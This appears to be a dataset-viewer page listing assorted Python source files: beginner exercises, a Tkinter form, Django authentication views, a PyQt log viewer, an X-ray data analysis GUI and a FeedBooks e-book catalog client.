991,188 | f5fdf18b35161cb6a8568d35b7c3574bd18caff7 | # 3. 定义函数,判断二维数字列表中是否存在某个数字
# 输入:二维列表、11
# 输出:True
def is_exists(double_list,target):
for line in double_list:
if target in line:
return True
return False
double_list = [
[1,2,3,4],
[5,6,7,8],
[9,10,11,12],
[13,14,15,16]
]
print(is_exists(double_list,11)) |
991,189 | 5e8323ca2bdc93347fbcd6986635cb818aeb0292 | #导入unittest框架
import unittest
#导入测试用例,并实例化
from Unittest框架.testcases.完整的测试框架案例 import Test01
from Unittest框架.testcases.test04 import Test04
if __name__ == '__main__':
#实例化testsuite
suite = unittest.TestSuite()
#调用添加用例方法 Test02类 里的test001方法
suite.addTest(Test04("test001"))
#实例化TextTestRunner() 测试执行
runner = unittest.TextTestRunner()
#调用run方法执行
runner.run(suite)
|
991,190 | 125331481c7a8727c7a739aa35d174a2a0d58517 | EVENTBRITEAPI = 'https://www.eventbriteapi.com/v3/users/me/events/' |
991,191 | 00661609cdc1541e190e5fddc10db254a12be291 | #Q5
x=list(map(int,input("Enter array x: ").split(" ")))
y=list(map(int,input("Enter array y: ").split(" ")))
z=list(map(lambda n1,n2: n1+n2,x,y))
print(z) |
991,192 | bd5f795c44c01cf8dab8220b1fe408f8d371aa97 | from tkinter import *
class Form:
def __init__(self, parent):
Label(parent, text='Введіть перше число', pady=10, width=30).pack()
self.entry1 = Entry(parent, width=25)
self.entry1.pack()
self.err1 = Label(parent, text='', fg='red')
self.err1.pack()
Label(parent, text='Введіть друге число', pady=10, width=30).pack()
self.entry2 = Entry(parent, width=25)
self.entry2.pack()
self.err2 = Label(parent, text='', fg='red')
self.err2.pack()
Label(parent, text='Введіть третє число', pady=10, width=30).pack()
self.entry3 = Entry(parent, width=25)
self.entry3.pack()
self.err3 = Label(parent, text='', fg='red')
self.err3.pack()
self.multiply = BooleanVar()
Radiobutton(parent, text='Різниця найбільшого і найменшого', pady=10, variable=self.multiply, value=0).pack()
Radiobutton(parent, text='Сума найбільшого і найменшого', pady=10, variable=self.multiply, value=1).pack()
self.submitBtn = Button(parent, text='Порахувати', command=self.submit, width=20)
self.submitBtn.pack()
self.resultLabel = Label(parent, text='', pady=10)
self.resultLabel.pack()
def submit(self):
value1 = self.entry1.get()
value2 = self.entry2.get()
value3 = self.entry3.get()
isMultiply = self.multiply.get()
self.resultLabel['text'] = ''
self.err1['text'] = ''
self.err2['text'] = ''
self.err3['text'] = ''
self.err1['text'] = self.checkNumeric(value1)
self.err1['text'] = self.checkEmpty(value1)
self.err2['text'] = self.checkNumeric(value2)
self.err2['text'] = self.checkEmpty(value2)
self.err3['text'] = self.checkNumeric(value3)
self.err3['text'] = self.checkEmpty(value3)
if self.err1['text'] or self.err2['text'] or self.err3['text']:
return
num1 = int(value1)
num2 = int(value2)
num3 = int(value3)
numMax = max(num1, num2, num3)
numMin = min(num1, num2, num3)
if isMultiply:
self.result(numMax, numMin)
else:
self.result(numMax, -numMin)
def checkNumeric(self, value):
if not value.isnumeric():
return 'Полe має містити лише числа'
def checkEmpty(self, value):
if not value:
return 'Поле є обов\'язковим'
def result(self, value1, value2):
result = value1 + value2
self.resultLabel['text'] = f'Результат: {result}'
self.resultLabel['fg'] = 'black'
return
root = Tk()
root.title('Варіант 10')
root.resizable(False, False)
x = (root.winfo_screenwidth() - root.winfo_reqwidth()) / 2
y = (root.winfo_screenheight() - root.winfo_reqheight()) / 2
root.wm_geometry("+%d+%d" % (x, y))
Form(root)
root.mainloop() |
991,193 | 8c35db8cdc4ea3ad086520327cb5c75ffd4a8c5c | from django.contrib.auth import authenticate, login, logout
from dashboard.models import BusAndRoutes, BusRegistartion, CompanyStaff, CompanyInformation
from django.shortcuts import render,redirect
from django.urls import reverse
from django.http import HttpResponseRedirect
from django.contrib import messages
from dashboard.forms import registerUser
# Create your views here.
def login_user(request):
if request.user.is_authenticated:
return HttpResponseRedirect(reverse('home_dashboard'))
else:
if request.method == "POST":
username = request.POST.get('login_username')
password = request.POST.get('login_password')
user = authenticate(request, username = username, password = password)
if user is not None:
login(request,user)
print(user.first_name)
print(user.last_name)
print(user.email)
print(user.username)
get_user = CompanyStaff.objects.all()
context = {
'get_user':get_user,
}
return HttpResponseRedirect(reverse('home_dashboard'), context)
else:
messages.error(request, 'Invalid credentials')
return render(request, 'authentication/login.html')
def get_registration(request):
form = registerUser(request.POST or None)
if form.is_valid():
instance = form.save(commit = False)
instance.save()
messages.success(request, 'Registartion done successfuly')
return redirect('/authentication/user/auth/login/')
context = {
'form':form,
}
return render(request, 'authentication/user_registration.html', context)
def register(request):
return render(request, 'authentication/register.html')
def company_login(request):
return render(request, 'authentication/company_login.html')
def logout_user(request):
logout(request)
return HttpResponseRedirect(reverse('login_user_authentication'))
|
991,194 | f21e03fad871b120a3827cd0c8acfc8f9397b88e | myName = input("your name: ")
myAge = int(input("your age: "))
print("1. Hello World, my name is %s and I am %d years old." % (myName, myAge))
print("2. Hello World, my name is %s and I am %s years old." % (myName, myAge))
print("3. Hello World, my name is {} and I am {} years old.".format(myName, myAge))
print('4. Hello World, my name is {0:s} and I am {1:d} years old.'.format(myName, myAge))
print("5. Hello World, my name is " + myName + " and I am " + str(myAge) + " years old.")
print("6. Hello World, my name is " + myName + " and I am", myAge, "years old.")
'''
Summary
1. int value can be output as %d or %s
2. raw_input() accepts input as string. (Python 2)
3. print(), brackets can be ignored in Python 2
'''
|
991,195 | ce436f3ce06d94914d9535ac3502b79d567b254a | from PyQt5 import QtCore
from PyQt5.QtWidgets import *
from PyQt5 import QtGui
from GraphicalTailForm import *
from PyQt5.QtWidgets import QApplication, QDialog
import threading
class GraphicalTail(QtCore.QObject):
output = None
w = None
textWrittenSignal = QtCore.pyqtSignal(str)
def __init__(self) :
QtCore.QObject.__init__(self)
self.output = open('/tmp/GoboLinuxInstall.log', 'w')
self.color = {}
self.color['Gray'] =('\033[1;30m' , '<font color="#777777">')
self.color['BoldBlue'] =('\033[1;34m' , '<font color="#777700">')
self.color['Brown'] =('\033[33m' , '<font color="#777700">')
self.color['Yellow'] =('\033[1;33m' , '<font color="#777700">')
self.color['BoldGreen']=('\033[1;32m' , '<font color="#005050">')
self.color['BoldRed'] =('\033[1;31m' , '<font color="#FF0000">')
self.color['Cyan'] =('\033[36m' , '<font color="#005050">')
self.color['BoldCyan'] =('\033[1;36m' , '<font color="#777700">')
self.color['RedWhite'] =('\033[41;37m', '<font color="#777700">')
self.color['Normal'] =('\033[0m' , '</font>')#'"#000000"')
self.color['LineBreak']=('\n' , '<br>')
self.textWrittenSignal.connect(self.textWritten)
self.initQt()
def enableOk(self) :
self.output.close()
self.w.okButton.setEnabled(1)
def append(self, s):
if not s.endswith('\n'):
s += '\n'
try :
self.output.write(s)
except :
pass
self.textWrittenSignal.emit(s)
def textWritten(self, s) :
for key in self.color.keys() :
terminal, html = self.color[key]
s = s.replace(terminal, html)
cursor = self.w.textWidget.textCursor()
if self.w.autoScroll.isChecked():
cursor.movePosition(QtGui.QTextCursor.End)
cursor.insertHtml(s)
if self.w.autoScroll.isChecked():
self.w.textWidget.setTextCursor(cursor)
self.w.textWidget.ensureCursorVisible()
def initQt(self):
self.app = QApplication([])
self.window = QDialog()
self.ui = Ui_GraphicalTailFormDialog()
self.ui.setupUi(self.window)
self.window.setGeometry(QtCore.QRect(50, 50, 600, 600))
self.window.show()
self.w = self.ui
def exec_(self):
self.app.exec_()
|
991,196 | d5e68f7776bed3745334d87f270054151be3b21b | #!/usr/bin/env python
# coding=utf-8
##############################################################################
#
# pyxda.srxes X-ray Data Analysis Library
# (c) 2013 National Synchrotron Light Source II,
# Brookhaven National Laboratory, Upton, NY.
# All rights reserved.
#
# File coded by: Michael Saltzman
#
# See AUTHORS.txt for a list of people who contributed.
# See LICENSE.txt for license information.
#
##############################################################################
import chaco.api
import traitsui.api
import enable.api
import numpy as np
import Queue
import threading
import os
from traits.api import HasTraits, Instance, Int, List, Bool, Str
from display import Display
from controlpanel import ControlPanel, MetadataPanel
from image import Image, ImageCache
from loadthread import LoadThread
class ProcessCenter(HasTraits):
'''Delegates tasks to the appropriate resources and stores data.
Manages GUI events and decides who should handle them. Also, serves as the
central data structure to store all of the information related to the
current data set.
'''
##############################################
# Initialize
##############################################
def __init__(self, **kwargs):
super(ProcessCenter, self).__init__()
self.processing_job = threading.Thread(target=self.processJob)
self.processing_job.daemon = True
self.jobqueue = Queue.Queue()
self.add_trait('display', Display(self.jobqueue))
self.add_trait('datalist', List())
self.add_trait('datalistlength', Int())
self.add_trait('message', Str(''))
self.add_trait('cache', Instance(ImageCache, ImageCache()))
self.add_trait('pic', Instance(Image))
self.add_trait('hasImage', Bool())
self.initDisplay()
self.initData()
return
def initDisplay(self):
'''Plots are initialized as None.
This allows for consistency with the plot methods of the Display
class. They will be created when these methods are called the first
time.
'''
self.imageplot = None
self.histogram = None
self.plot1d = None
return
def initData(self):
'''Initializes all values before a data set is chosen.
This method is used both at start and when switching directories in
order to reset the display and internal mechanisms.
'''
del self.datalist[:]
self.datalistlength = 0
self.message = ''
self.hasImage = False
self.cache.clear()
self.newndx = -1
self.rrplots = {}
pic = Image(-1, '')
pic.data = np.zeros((2048, 2048))
self.pic = pic
self.plotData()
self.on_trait_change(self.plotData, 'pic', dispatch='new')
return
##############################################
# Jobs
##############################################
def addNewImage(self, path, **kwargs):
'''Adds a new image to the list of data in the directory.
path -- the filepath of the image
Displays warning if there is no associated metadata file
named path.metadata.
'''
#print 'Image Added:'
n = len(self.datalist)
self.datalist.append(Image(n, path))
self.hasImage = True
self.datalistlength += 1
if not self.datalist[n].metadata:
self.message = 'No metadata found for %s.' % os.path.split(path)[1]
print self.message
return
def plotData(self):
'''Updates the plots to display data related to the current image.'''
#print 'Plot Data'
self.pic.load()
self.imageplot = self.display.plotImage(self.pic, self.imageplot)
self.histogram = self.display.plotHistogram(self.pic, self.histogram)
self.plot1d = self.display.plot1DCut(self.pic, self.plot1d)
return
def startLoad(self, dirpath):
'''Creates a load thread to process the current directory.
If a directory has already been chosen, the display will be reset
first.
'''
#print 'Load Started'
if self.hasImage == True:
self.initData()
self.loadimage = LoadThread(self.jobqueue, dirpath)
self.loadimage.start()
return
def initCache(self):
'''Initializes the cache by placing the first 2 images in the cache.'''
#print 'Init Cache'
self.pic = self.datalist[0]
for i in range(2):
pic = self.datalist[i]
self.cache.append(pic)
pic.load()
return
def changeIndex(self, newndx):
'''Determines how the new image selection should be processed.'''
#print 'Change Index'
self.newndx = newndx
currentpos = self.pic.n
if newndx - currentpos == -1:
#print 'Click left'
self.updateCache('left')
elif newndx - currentpos == 1:
#print 'Click right'
self.updateCache('right')
elif newndx - currentpos == 0:
#print 'Click same'
return
elif newndx < self.datalistlength and newndx >= 0:
#print 'Click skip'
self.updateCache('click')
return
def updateCache(self, strnext):
'''Updates the image cache based on the current image.
strnext -- the type of traversal: either left, right, or click
| Warning: No images loaded.
| Warning: Cannot traverse LEFT.
| Warning: Cannot traverse RIGHT.
'''
#print 'Update Cache'
#print self.cache
n = self.pic.n
if n == -1:
self.message = 'WARNING: No images loaded.'
print self.message
return
if strnext == 'left':
self.newndx = n - 1
#print '%d -> %d' % (n, self.newndx)
if n == 0:
self.message = 'WARNING: Cannot traverse LEFT.'
print self.message
return
else:
self._innerCache(n, -1)
elif strnext == 'right':
self.newndx = n + 1
#print '%d -> %d' % (n, self.newndx)
if n == self.datalistlength - 1:
self.message = 'WARNING: Cannot traverse RIGHT.'
print self.message
return
else:
self.cache.reverse()
self._innerCache(n, 1)
self.cache.reverse()
elif strnext == 'click':
#print '%d -> %d' % (n, self.newndx)
self.cache.clear()
if self.newndx == 0:
self.initCache()
else:
self.pic = self.datalist[self.newndx]
self.cache.append(self.datalist[self.newndx-1])
self.cache.append(self.pic)
if self.newndx != self.datalistlength - 1:
self.cache.append(self.datalist[self.newndx+1])
else:
self.cache.append(Image(-1, ''))
#print self.cache
return
def _innerCache(self, n, i):
'''Internal cache method that deals with cache logic when updating.'''
self.pic = self.cache.popleft()
self.cache.appendleft(self.pic)
if (n > 1 and i == -1) or (n < self.datalistlength-2 and i == 1):
pic = self.datalist[n+i*2]
self.cache.appendleft(pic)
if (n == 1 and i == -1) or (n == self.datalistlength-2 and i == 1):
self.cache.pop()
return
# TODO: As more RRs are supported, move them to a separate file.
def countLowPixels(self, image):
'''Finds the percentage of pixels below the selected threshold.
image -- Image object
'''
selection = self.display._selection
data = image.ravel()
limit = selection[0]
count = np.count_nonzero(data < limit)
rv = count/float(np.size(data))
return rv*100
def countHighPixels(self, image):
'''Finds the percentage of pixels above the selected threshold.
image -- Image object
'''
selection = self.display._selection
data = image.ravel()
limit = selection[1]
count = np.count_nonzero(data > limit)
rv = count/float(np.size(data))
return rv*100
def createRRPlot(self, rrchoice):
'''Generates a new plot based on the RR given and the current data.
rrchoice -- the reduced representation
| Warning: RR Plot Cannot be (Re)created
| Warning: No RR selected.
'''
if self.datalistlength == 0:
self.message = 'WARNING: RR Plot Cannot be (Re)created'
print self.message
return
elif rrchoice == 'Choose a Reduced Representation':
self.message = 'WARNING: No RR selected.'
print self.message
return
if rrchoice == 'Mean':
f = lambda x: np.mean(x)
elif rrchoice == 'Total Intensity':
f = lambda x: np.sum(x)
elif rrchoice == 'Standard Deviation':
f = lambda x: np.std(x)
elif rrchoice == '% Pixels Below Threshold':
if self.display._selection != None:
f = self.countLowPixels
else:
self.message = 'A range selection must be chosen.'
print self.message
return
elif rrchoice == '% Pixels Above Threshold':
if self.display._selection != None:
f = self.countHighPixels
else:
self.message = 'A range selection must be chosen.'
print self.message
return
if rrchoice not in self.rrplots:
self.rrplots[rrchoice] = rrplot = self.display.plotRRMap(
np.array([0]), rrchoice, None)
else:
return
rrdata = np.array([])
self.message = 'Generating RR Plot........'
print self.message
for i, image in enumerate(self.datalist):
image.load()
self.message = '%d: %s........Loaded' % (i+1, image.name)
print self.message
rr = f(image.data)
rrdata = np.append(rrdata, rr)
rrplot = self.display.plotRRMap(rrdata, rrchoice, rrplot)
image.data = None
self.message = 'Loading Complete.'
print self.message
return
##############################################
# Job Processing
##############################################
def startProcessJob(self):
'''Starts a thread to process tasks in the jobqueue.'''
self.processing_job.start()
return
def processJob(self):
'''Translates a job into the appropriate method calls.
A job must be in the following form:
['task', [kwargs]]
'''
while True:
# retrieve job data
jobdata = self.jobqueue.get(block=True)
jobtype = jobdata[0]
kwargs = jobdata[1] if len(jobdata)==2 else {}
# deal with different jobs
if jobtype == 'newimage':
self.addNewImage(**kwargs)
elif jobtype == 'updatecache':
self.updateCache(*kwargs)
elif jobtype == 'initcache':
self.initCache()
elif jobtype == 'plotrr':
self.createRRPlot(*kwargs)
elif jobtype == 'changendx':
self.changeIndex(*kwargs)
elif jobtype == 'startload':
self.startLoad(*kwargs)
elif jobtype == 'updatecmap':
self.display.updateColorMap(*kwargs)
elif jobtype == 'updatemsg':
self.message = jobdata[1]
self.jobqueue.task_done()
return
def main():
a = PyXDA()
a.startProcessJob()
a.loadimage.initLive()
a.loadimage.start()
return
if __name__=='__main__':
main()
|
991,197 | 70824c1ef5fe45cca29e3aa00d7ad278ddee0291 | # 幂运算
print(2 ** 10)
# 地板除
print(3 // 2)
# 海象运算符 可在表达式内部为变量赋值
#a = [1,2,3]
#if(n := len(a)) > 2
# print("...")
# 位运算 异或 取反
a = 1
b = 1
c = a^b
print(c)
c = ~c
print(c) |
991,198 | 75ff50a27ffcde61a291e05ffa9ed16fa0780f5c | from django.shortcuts import render,redirect
from django.contrib.auth.models import User
from django.contrib import auth
def register(request):
if request.method=='POST':
if request.POST['pword']==request.POST['pword2']:
try:
user= User.objects.get(username = request.POST['username'])
return render (request,'accounts/register.html',{'error':'Username has already been taken'})
except User.DoesNotExist:
user= User.objects.create_user(request.POST['username'],password=request.POST['pword'])
auth.login(request,user)
return redirect ('home')
else:
return render (request,'accounts/register.html',{'error':'Passwords must match'})
else:
return render (request,'accounts/register.html')
def login(request):
if request.method=='POST':
user = auth.authenticate(username=request.POST['username'], password= request.POST['pword'])
if user is not None:
auth.login(request,user)
return redirect ('home')
else:
return render (request,'accounts/login.html', {'error': 'username or password is incorrect'})
else:
return render (request,'accounts/login.html')
def logout(request):
#re route to home
return render(request, 'accounts/register.html')
|
991,199 | ee68e7f046548a64d52d8a2980a5a9341711f70e | from feedparser import parse
from PyQt4 import QtGui, QtCore, QtWebKit, uic
import sys, os, urllib.request, urllib.parse, urllib.error
from models import *
from pprint import pprint
from math import ceil
from pluginmgr import BookStore
from templite import Templite
import codecs
import urllib.parse
import time
# This gets the main catalog from feedbooks.
EBOOK_EXTENSIONS=['epub','mobi','pdf']
class Catalog(BookStore):
title = "FeedBooks: Free and Public Domain Books"
itemText = "FeedBooks.com"
def __init__(self):
BookStore.__init__(self)
self.w = None
def setWidget (self, widget):
tplfile = os.path.join(
os.path.abspath(
os.path.dirname(__file__)),'category.tmpl')
tplfile = codecs.open(tplfile,'r','utf-8')
self.template = Templite(tplfile.read())
tplfile.close()
self.widget = widget
def operate(self):
"Show the store"
if not self.widget:
print("Call setWidget first")
return
self.widget.title.setText(self.title)
if not self.w:
uifile = os.path.join(
os.path.abspath(
os.path.dirname(__file__)),'store.ui')
self.w = uic.loadUi(uifile)
self.pageNumber = self.widget.stack.addWidget(self.w)
self.crumbs=[]
self.openUrl(QtCore.QUrl('http://www.feedbooks.com/catalog.atom'))
self.w.store_web.page().setLinkDelegationPolicy(QtWebKit.QWebPage.DelegateExternalLinks)
self.w.store_web.page().linkClicked.connect(self.openUrl)
self.w.crumbs.linkActivated.connect(self.openUrl)
self.w.store_web.loadStarted.connect(self.loadStarted)
self.w.store_web.loadProgress.connect(self.loadProgress)
self.w.store_web.loadFinished.connect(self.loadFinished)
self.widget.stack.setCurrentIndex(self.pageNumber)
showGrid = operate
showList = operate
def search (self, terms):
url = "http://www.feedbooks.com/search.atom?"+urllib.parse.urlencode(dict(query=terms))
self.crumbs=[self.crumbs[0],["Search: %s"%terms, url]]
self.openUrl(QtCore.QUrl(url))
def openUrl(self, url):
if isinstance(url, QtCore.QUrl):
url = url.toString()
url = str(url)
# This happens for catalogs by language
if url.startswith('/'):
url=urllib.parse.urljoin('http://feedbooks.com',url)
extension = url.split('.')[-1]
print(("Opening:",url))
if url.split('/')[-1].isdigit() or url.split('/')[-2].isdigit():
# A details page
crumb = ["#%s"%url.split('/')[-1],url]
if crumb in self.crumbs:
self.crumbs = self.crumbs[:self.crumbs.index(crumb)+1]
else:
self.crumbs.append(crumb)
self.showCrumbs()
self.w.store_web.load(QtCore.QUrl(url))
elif extension in EBOOK_EXTENSIONS:
# It's a book, get metadata, file and download
book_id = url.split('/')[-1].split('.')[0]
bookdata = parse("http://www.feedbooks.com/book/%s.atom"%book_id)
if bookdata.status == 404:
bookdata = parse("http://www.feedbooks.com/userbook/%s.atom"%book_id)
bookdata = bookdata.entries[0]
title = bookdata.title
self.setStatusMessage.emit("Downloading: "+title)
book = Book.get_by(title = title)
if not book:
# Let's create a lot of data
tags = []
for tag in bookdata.get('tags',[]):
t = Tag.get_by(name = tag.label)
if not t:
t = Tag(name = tag.label)
tags.append(t)
ident = Identifier(key="FEEDBOOKS_ID", value=book_id)
author = Author.get_by (name = bookdata.author)
if not author:
author = Author(name = bookdata.author)
book = Book (
title = title,
authors = [author],
tags = tags,
identifiers = [ident]
)
session.commit()
# Get the file
book.fetch_file(url, extension)
book.fetch_cover("http://www.feedbooks.com/book/%s.jpg"%book_id)
else:
self.showBranch(url)
def showCrumbs(self):
ctext = []
for c in self.crumbs:
ctext.append('<a href="%s">%s</a>'%(c[1],c[0]))
ctext = " > ".join(ctext)
self.w.crumbs.setText(ctext)
def showBranch(self, url):
"""Trigger download of the branch, then trigger
parseBranch when it's downloaded"""
print(("Showing:", url))
# Disable updates to prevent flickering
self.w.store_web.setUpdatesEnabled(False)
self.w.store_web.page().mainFrame().load(QtCore.QUrl(url))
self.setStatusMessage.emit("Loading: "+url)
self.w.store_web.page().loadFinished.connect(self.parseBranch)
return
@QtCore.pyqtSlot()
def parseBranch(self):
"""Replaces the content of the web page (which is assumed to be
an Atom feed from Feedbooks) with the generated HTML.
"""
self.w.store_web.page().loadFinished.disconnect(self.parseBranch)
url = str(self.w.store_web.page().mainFrame().requestedUrl().toString())
print(("Parsing the branch:", url))
t1 = time.time()
data = parse(str(self.w.store_web.page().mainFrame().toHtml()).encode('utf-8'))
print(("Parsed branch in: %s seconds"%(time.time()-t1)))
title = data.feed.get('title','')
if 'page=' in url: # A page
print("DELETING LAST CRUMB")
if 'page=' in self.crumbs[-1][1]:
#last one was also a page
del self.crumbs[-1]
if title:
crumb = [title.split("|")[0].split("/")[-1].strip(), url]
try:
r=self.crumbs.index(crumb)
self.crumbs=self.crumbs[:r+1]
except ValueError:
self.crumbs.append(crumb)
self.showCrumbs()
books = []
links = []
for entry in data.entries:
# Find acquisition links
acq_links = [l.href for l in entry.links if l.rel=='http://opds-spec.org/acquisition']
if acq_links: # Can be acquired
books.append(entry)
else:
links.append(entry)
totPages = int(ceil(float(data.feed.get('opensearch_totalresults', 1))/int(data.feed.get('opensearch_itemsperpage', 1))))
curPage = int(urllib.parse.parse_qs(urllib.parse.urlparse(url).query).get('page',[1])[-1])
t1 = time.time()
html = self.template.render(
title = title,
books = books,
links = links,
url = url,
totPages = totPages,
curPage = int(curPage)
)
print(("Rendered in: %s seconds"%(time.time()-t1)))
# open('x.html','w+').write(html)
self.w.store_web.page().mainFrame().setHtml(html)
self.w.store_web.setUpdatesEnabled(True)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.